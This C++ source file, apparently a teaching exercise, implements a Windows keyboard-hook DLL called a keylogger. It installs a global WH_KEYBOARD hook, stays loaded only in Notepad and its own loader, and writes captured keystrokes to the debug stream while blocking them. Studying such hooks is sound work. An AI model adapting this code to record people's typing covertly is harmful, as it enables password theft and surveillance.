// dllmain.cpp : Defines the entry point for the DLL application.
#include "windows.h"
#include "cstdio"
#include "tchar.h"
#include "tlhelp32.h"
#include "psapi.h"
// Module-wide state. No shared data section is declared in this file, so each
// process that loads the DLL gets its own copy of these variables.
HINSTANCE g_hInstance = NULL; // this DLL's module handle, recorded in DllMain and passed to SetWindowsHookExW
HHOOK g_hHook = NULL; // hook handle returned by SetWindowsHookExW in hookstart; NULL while no hook is installed
HWND g_hWnd = NULL; // not referenced anywhere in this file
TCHAR buf[BUFSIZ] = { 0, }; // receives the full path of the host process's executable (BUFSIZ characters)
TCHAR *pt = NULL; // points at the last '\\' inside buf once DllMain has parsed the path
DWORD sPid; // id of the process the DLL is loaded into, set in DllMain
HANDLE sHnd; // handle to the current process, set in DllMain
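/**
 * DLL entry point.
 *
 * On DLL_PROCESS_ATTACH the host executable's path is read and the load is
 * allowed only when the file name is exactly "notepad.exe" or "KeyLogger.exe".
 * In every other process, and whenever the path cannot be read, FALSE is
 * returned so the loader rejects the DLL and unloads it again.
 *
 * @param hinstDLL            module handle of this DLL; stored in g_hInstance.
 * @param ul_reason_for_call  loader notification code.
 * @param lpReserved          unused.
 * @return TRUE to accept the load, FALSE to reject it.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Every original branch recorded the module handle, so do it once up front.
        g_hInstance = hinstDLL;
        sPid = GetCurrentProcessId();

        // The pseudo-handle always refers to the current process and never has
        // to be closed. The original opened a real PROCESS_ALL_ACCESS handle
        // to its own process here and leaked it.
        sHnd = GetCurrentProcess();

        // The size argument is a count of characters, not bytes. The original
        // passed sizeof(buf), which claims twice the real capacity for wide
        // characters.
        const DWORD capacity = sizeof(buf) / sizeof(buf[0]);
        const DWORD length = GetModuleFileNameW(NULL, buf, capacity);
        if (length == 0 || length >= capacity) {
            // Fail closed: without a complete path the process cannot be
            // identified, so treat it like any other unlisted process.
            OutputDebugStringW(L"GetModuleFileNameEx Fail\n");
            return FALSE;
        }

        // _tcsrchr returns NULL when the path holds no backslash; the original
        // dereferenced pt + 1 unconditionally.
        pt = _tcsrchr(buf, '\\');
        const TCHAR *fileName = (pt != NULL) ? pt + 1 : buf;

        // notepad hooking
        if (!_tcscmp(fileName, L"notepad.exe")) {
            OutputDebugStringW(L"notepad attach\n");
            return TRUE;
        }
        // keylogger hooking (essential): the process that calls hookstart
        if (!_tcscmp(fileName, L"KeyLogger.exe")) {
            OutputDebugStringW(L"KeyLogger attach\n");
            return TRUE;
        }
        return FALSE;
    }
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}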
/**
 * WH_KEYBOARD hook procedure.
 *
 * For a key-down event (bit 31 of lParam clear) with nCode >= 0, wParam is
 * formatted with "%c" and written to the debugger output stream, and 1 is
 * returned. A non-zero return tells the system not to pass the message on to
 * the rest of the hook chain or to the target window. For WH_KEYBOARD, wParam
 * carries a virtual-key code, so the emitted character is that code rather
 * than translated text.
 *
 * Every other event is forwarded with CallNextHookEx.
 *
 * @param nCode   hook code; negative values must be passed on untouched.
 * @param wParam  virtual-key code of the key.
 * @param lParam  keystroke flags; bit 31 is the transition state.
 * @return 1 when the event was handled here, otherwise the result of
 *         CallNextHookEx.
 */
LRESULT CALLBACK KeyBoardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    const bool isKeyDown = (lParam & 0x80000000) == 0;
    if (nCode < 0 || !isKeyDown) {
        return CallNextHookEx(g_hHook, nCode, wParam, lParam);
    }

    // Query the exit code of the process this procedure is running in.
    DWORD exitCode = 0;
    GetExitCodeProcess(GetCurrentProcess(), &exitCode);

    if (exitCode != STILL_ACTIVE) {
        ::OutputDebugStringW(_T("Current is Process is Dead\n"));
        return 1;
    }

    TCHAR text[100] = { 0, };
    wsprintfW(text, L"%c", wParam);
    ::OutputDebugStringW(text);
    return 1;
}
#ifdef __cplusplus
extern "C" {
#endif
/**
 * Exported entry: installs KeyBoardProc as a WH_KEYBOARD hook.
 *
 * A thread id of 0 requests a hook for every thread on the calling thread's
 * desktop, so the system maps this DLL into those processes. DllMain then
 * decides per process whether the load is accepted.
 *
 * The result is stored in g_hHook without being checked. It is NULL when
 * installation fails.
 */
__declspec(dllexport) void hookstart() {
    const DWORD allDesktopThreads = 0;
    g_hHook = SetWindowsHookExW(WH_KEYBOARD, KeyBoardProc, g_hInstance, allDesktopThreads);
}
/**
 * Exported entry: removes the hook installed by hookstart, if any, and clears
 * g_hHook so that a second call does nothing.
 */
__declspec(dllexport) void hookstop() {
    if (g_hHook == NULL) {
        return;
    }
    UnhookWindowsHookEx(g_hHook);
    g_hHook = NULL;
}
#ifdef __cplusplus
}
#endif